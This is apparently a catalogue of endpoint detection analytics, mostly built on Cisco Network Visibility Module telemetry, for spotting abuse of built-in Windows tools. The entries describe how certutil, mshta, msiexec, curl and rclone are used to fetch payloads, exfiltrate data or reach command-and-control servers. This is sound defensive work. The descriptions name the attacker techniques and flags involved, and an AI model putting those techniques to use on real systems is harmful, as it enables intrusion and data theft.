Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download: endpointEndpoint2025-07-03version:1
This analytic detects suspicious use of `rundll32.exe` in combination with `mshtml.dll` and the export `RunHTMLApplication`.
This behavior is often observed in malware to execute JavaScript or VBScript in memory, enabling payload staging or
bypassing script execution policies and bypassing the usage of the "mshta.exe" binary.
The detection leverages Cisco Network Visibility Module telemetry which offers network flow activity
along with process information such as command-line arguments
If confirmed malicious, this activity may indicate initial access or payload download.
Cisco NVM - Webserver Download From File Sharing Website: endpointEndpoint2025-07-01version:1
This analytic detects unexpected outbound network connections initiated by known webserver processes such as `httpd.exe`, `nginx.exe`, or `tomcat.exe` to common file sharing or public content hosting services like GitHub, Discord CDN, Transfer.sh, or Pastebin.
Webservers are rarely expected to perform outbound downloads, especially to dynamic or anonymous file hosting domains. This behavior is often associated with server compromise,
where an attacker uses a reverse shell, webshell, or injected task to fetch malware or tools post-exploitation.
The detection leverages Cisco Network Visibility Module flow data, enriched with process context, to identify this highly suspicious behavior.
Cisco NVM - Suspicious Network Connection Initiated via MsXsl: endpointEndpoint2025-07-03version:1
This analytic identifies the use of `msxsl.exe` initiating a network connection to a non-private IP address.
Although `msxsl.exe` is a legitimate Microsoft utility used to apply XSLT transformations, adversaries can abuse it
to execute arbitrary code or load external resources in an evasive manner.
This detection leverages Cisco NVM telemetry to identify potentially malicious use of `msxsl.exe` making network connections
that may indicate command and control (C2) or data exfiltration activity.
Windows InstallUtil URL in Command Line: endpointEndpoint2025-02-03version:11
The following analytic detects the use of Windows InstallUtil.exe with an HTTP or HTTPS URL in the command line. This is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions containing URLs. This activity is significant as it may indicate an attempt to download and execute malicious code, potentially bypassing application control mechanisms. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment. Analysts should review the parent process, network connections, file modifications, and related processes for further investigation.
Detect RClone Command-Line Usage: endpointEndpoint2025-07-04version:12
The following analytic detects the usage of `rclone.exe` with specific command-line arguments indicative of file transfer activities. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as `rclone.exe` is often used by adversaries for data exfiltration, especially during ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized data transfer, resulting in data breaches and potential loss of sensitive information. Immediate isolation of the affected endpoint and further investigation are recommended.
Windows Curl Upload to Remote Destination: endpointEndpoint2025-06-20version:10
The following analytic detects the use of Windows Curl.exe to upload a file to a remote destination. It identifies command-line arguments such as `-T`, `--upload-file`, `-d`, `--data`, and `-F` in process execution logs. This activity is significant because adversaries may use Curl to exfiltrate data or upload malicious payloads. If confirmed malicious, this could lead to data breaches or further compromise of the system. Analysts should review parallel processes and network logs to determine if the upload was successful and isolate the endpoint if necessary.
Windows InstallUtil Remote Network Connection: endpointEndpoint2025-06-26version:15
The following analytic detects the Windows InstallUtil.exe binary making a remote network connection. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network telemetry. This activity is significant because InstallUtil.exe can be exploited to download and execute malicious code, bypassing application control mechanisms. If confirmed malicious, an attacker could achieve code execution, potentially leading to further system compromise, data exfiltration, or lateral movement within the network. Analysts should review the parent process, network connections, and any associated file modifications to determine the legitimacy of this activity.
Cisco NVM - Suspicious Network Connection From Process With No Args: endpointEndpoint2025-07-02version:1
This analytic detects system binaries that are commonly abused in process injection techniques but are observed without any command-line arguments.
It leverages Cisco Network Visibility Module (NVM) flow data and process arguments
to identify outbound connections initiated by curl where TLS checks were explicitly disabled.
Binaries such as `rundll32.exe`, `regsvr32.exe`, `dllhost.exe`, `svchost.exe`, and others are legitimate Windows processes that are often injected into by malware or post-exploitation frameworks (e.g., Cobalt Strike) to hide execution.
When these processes are seen initiating a network connection with an empty or missing command line, it can indicate
potential injection and communication with a command and control server.
Cisco NVM - Suspicious Network Connection to IP Lookup Service API: endpointEndpoint2025-07-04version:1
This analytic identifies non-browser processes reaching out to public IP lookup or geolocation services,
such as `ipinfo.io`, `icanhazip.com`, `ip-api.com`, and others.
These domains are commonly used by legitimate tools, but their usage outside of browsers may indicate
network reconnaissance, virtual machine detection, or staging by malware.
This activity is observed in post-exploitation frameworks, stealer malware, and advanced threat actor campaigns.
The detection relies on Cisco Network Visibility Module (NVM) telemetry and excludes known browser
processes to reduce noise.
Windows File Download Via PowerShell: endpointEndpoint2025-06-23version:1
The following analytic detects the use of PowerShell's download methods such as
"DownloadString" and "DownloadData" from the WebClient class or Invoke-WebRequest
and it's aliases "IWR" or "Curl".
It leverages data from Endpoint Detection and Response (EDR) agents, focusing on
process execution logs that include command-line details.
This activity can be significant such methods and functions are commonly used in malicious
PowerShell scripts to fetch and execute remote code.
If confirmed malicious, this behavior could allow an attacker to download and run
arbitrary code, potentially leading to unauthorized access, data exfiltration,
or further compromise of the affected system.
Cisco NVM - Installation of Typosquatted Python Package: endpointEndpoint2025-07-03version:1
This analytic detects suspicious python package installations where the package name resembles popular Python libraries but may be typosquatted or slightly altered.
Typosquatting is a common technique used by attackers to trick users into installing malicious packages that mimic legitimate ones.
This detection leverages Cisco NVM flow telemetry and checks for pip or poetry package managers with the "install" or "add" flags, making outbound connections to package repository such as `pypi.org` with known or suspected typo package names.
Windows MSIExec Remote Download: endpointEndpoint2025-06-26version:10
The following analytic detects the use of msiexec.exe with an HTTP or
HTTPS URL in the command line, indicating a remote file download attempt. This detection
leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
execution logs that include command-line details. This activity is significant as
it may indicate an attempt to download and execute potentially malicious software
from a remote server. If confirmed malicious, this could lead to unauthorized code
execution, system compromise, or further malware deployment within the network.
Cisco NVM - Rclone Execution With Network Activity: endpointEndpoint2025-07-03version:1
This detection identifies execution of the file synchronization utility "rclone".
It leverages Cisco Network Visibility Module logs, specifically flow data in order to capture process executions
initiating network connections.
While rclone is a legitimate command-line tool for syncing data to cloud storage providers, it has been widely abused by threat actors for data exfiltration.
This analytic inspects process name and arguments for rclone and flags usage of suspicious flags.
If matched, this could indicate malicious usage for stealthy data exfiltration or cloud abuse.
WMIC XSL Execution via URL: endpointEndpoint2025-07-02version:10
The following analytic detects `wmic.exe` loading a remote XSL script
via a URL. This detection leverages Endpoint Detection and Response (EDR) data,
focusing on command-line executions that include HTTP/HTTPS URLs and the /FORMAT
switch. This activity is significant as it indicates a potential application control
bypass, allowing adversaries to execute JScript or VBScript within an XSL file.
If confirmed malicious, this technique can enable attackers to execute arbitrary
code, escalate privileges, or maintain persistence using a trusted Windows tool,
posing a severe threat to the environment.
Windows File Download Via CertUtil: endpointEndpoint2025-06-30version:3
The following analytic detects the use of `certutil.exe` to download files using the `-URL`, `-urlcache` or '-verifyctl' arguments. This behavior is identified by monitoring command-line executions for these specific arguments via Endpoint Detection and Response (EDR) telemetry. This activity is significant because `certutil.exe` is a legitimate tool often abused by attackers to download and execute malicious payloads. If confirmed malicious, this could allow an attacker to download and execute arbitrary files, potentially leading to code execution, data exfiltration, or further compromise of the system.
Cisco NVM - Susp Script From Archive Triggering Network Activity: endpointEndpoint2025-07-01version:1
This analytic detects script execution (`wscript.exe` or `cscript.exe`) triggered from compressed files opened directly using
`explorer.exe`, `winrar.exe`, or `7zFM.exe`.
When a user double clicks on a ".js" file from within one of these compressed files. Its extracted temporally in the temp directory in folder with certain markers.
It leverages Cisco Network Visibility Module (NVM) flow data, in order to look for a specific parent/child relationship and an initiated network connection.
This behavior is exploited by threat actors such as Scarlet Goldfinch to deliver and run malicious scripts as an initial access technique.
Detect HTML Help URL in Command Line: endpointEndpoint2025-06-30version:12
The following analytic detects the execution of hh.exe (HTML Help) loading a Compiled HTML Help (CHM) file from a remote URL. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing URLs. This activity is significant as it can indicate an attempt to execute malicious scripts via CHM files, potentially leading to unauthorized code execution. If confirmed malicious, this could allow an attacker to run scripts using engines like JScript or VBScript, leading to further system compromise or data exfiltration.
Cisco NVM - Suspicious Download From File Sharing Website: endpointEndpoint2025-07-01version:1
This analytic detects suspicious downloads from common file sharing and content delivery platforms using known living-off-the-land binaries (LOLBins)
such as 'curl.exe', 'certutil.exe', 'msiexec.exe', 'powershell.exe', 'wmic.exe', and others.
It leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path,
and parent process information. These tools are often abused by adversaries and malware to retrieve payloads from public hosting platforms
such as GitHub, Discord CDN, Transfer.sh, or Pastebin.
This detection helps identify potential initial access, payload staging, or command and control activity using legitimate services.
Detect MSHTA Url in Command Line: endpointEndpoint2025-06-30version:14
The following analytic detects the use of Microsoft HTML Application Host (mshta.exe) to make remote HTTP or HTTPS connections. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments containing URLs. This activity is significant because adversaries often use mshta.exe to download and execute remote .hta files, bypassing security controls. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further network infiltration.
Attacker Tools On Endpoint: endpointEndpoint2025-07-07version:12
The following analytic detects the execution of tools commonly exploited by cybercriminals, such as those used for unauthorized access, network scanning, or data exfiltration. It leverages process activity data from Endpoint Detection and Response (EDR) agents, focusing on known attacker tool names. This activity is significant because it serves as an early warning system for potential security incidents, enabling prompt response. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further network compromise, posing a severe threat to the organization's security infrastructure.
Windows HTTP Network Communication From MSIExec: endpointEndpoint2025-06-30version:6
The following analytic detects MSIExec making network connections over ports 443 or 80. This behavior is identified by correlating process creation events from Endpoint Detection and Response (EDR) agents with network traffic logs. Typically, MSIExec does not perform network communication to the internet, making this activity unusual and potentially indicative of malicious behavior. If confirmed malicious, an attacker could be using MSIExec to download or communicate with external servers, potentially leading to data exfiltration, command and control (C2) communication, or further malware deployment.
Windows Curl Download to Suspicious Path: endpointEndpoint2025-06-30version:14
The following analytic detects the use of Windows Curl.exe to download
a file to a suspicious location, such as AppData, ProgramData, or Public directories.
It leverages data from Endpoint Detection and Response (EDR) agents, focusing on
command-line executions that include the -O or --output options. This activity is
significant because downloading files to these locations can indicate an attempt
to bypass security controls or establish persistence. If confirmed malicious, this
behavior could lead to unauthorized code execution, data exfiltration, or further
compromise of the system.
Cisco NVM - Non-Network Binary Making Network Connection: endpointEndpoint2025-07-01version:1
This analytic detects network connections initiated by binaries that are not typically associated with network communication,
such as 'notepad.exe', 'calc.exe' or 'write.exe'.
It leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path, and parent process information.
These applications are normally used for locally and do not require outbound network access. When they do initiate such connections, it may indicate process hollowing, code injection, or proxy execution, where adversaries abuse a trusted process to mask malicious activity.
Cisco NVM - Curl Execution With Insecure Flags: endpointEndpoint2025-07-01version:1
This analytic detects the use of `curl.exe` with insecure flags such as `-k`, `--insecure`, `--proxy-insecure`, or `--doh-insecure`
which disable TLS certificate validation.
It leverages Cisco Network Visibility Module (NVM) flow data and process arguments
to identify outbound connections initiated by curl where TLS checks were explicitly disabled.
This behavior may indicate an attempt to bypass certificate validation to connect to potentially untrusted or malicious endpoints,
a common tactic in red team operations, malware staging, or data exfiltration over HTTPS.
Cisco NVM - Suspicious File Download via Headless Browser: endpointEndpoint2025-07-02version:1
This analytic identifies the use of Chromium-based browsers (like Microsoft Edge) running in headless mode with the `--dump-dom` argument.
This behavior has been observed in attack campaigns such as DUCKTAIL, where browsers are automated to stealthily download content from the internet using direct URLs or suspicious hosting platforms.
The detection focuses on identifying connections to known file-sharing domains or direct IPs extracted from command-line arguments and cross-checks those against the destination of the flow.
Since it leverages Cisco Network Visibility Module telemetry, the rule triggers only if a network connection is made.
Windows PowerShell FakeCAPTCHA Clipboard Execution: endpointEndpoint2025-06-30version:2
This detection identifies potential FakeCAPTCHA/ClickFix clipboard hijacking campaigns by looking for PowerShell execution with hidden window parameters and distinctive strings related to fake CAPTCHA verification. These campaigns use social engineering to trick users into pasting malicious PowerShell commands from their clipboard, typically delivering information stealers or remote access trojans.
Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI: endpointEndpoint2025-07-03version:1
This analytic detects suspicious use of 'mshta.exe' or 'rundll32.exe' invoking 'mshtml.dll'
or the 'RunHTMLApplication' export without including a direct HTTP/HTTPS URL in the command line.
This pattern could be associated with obfuscated script execution used by threat actors during
initial access or payload staging. The absence of a visible URL may indicate attempts to evade static
detections by embedding the URL via string concatenation, encoding (e.g., hex), or indirect script loaders
like 'GetObject()'.
Cisco NVM - Outbound Connection to Suspicious Port: endpointEndpoint2025-07-01version:1
The following analytic detects any outbound network connection from an endpoint process to a known suspicious or non-standard port.
It leverages Cisco Network Visibility Module flow data logs to identify potentially suspicious behavior by looking at processes
communicating over ports like 4444, 2222, or 51820 are commonly used by tools like Metasploit, SliverC2 or other pentest, red team or malware.
These connections are worth investigating further, especially when initiated by unexpected or non-network-native binaries.
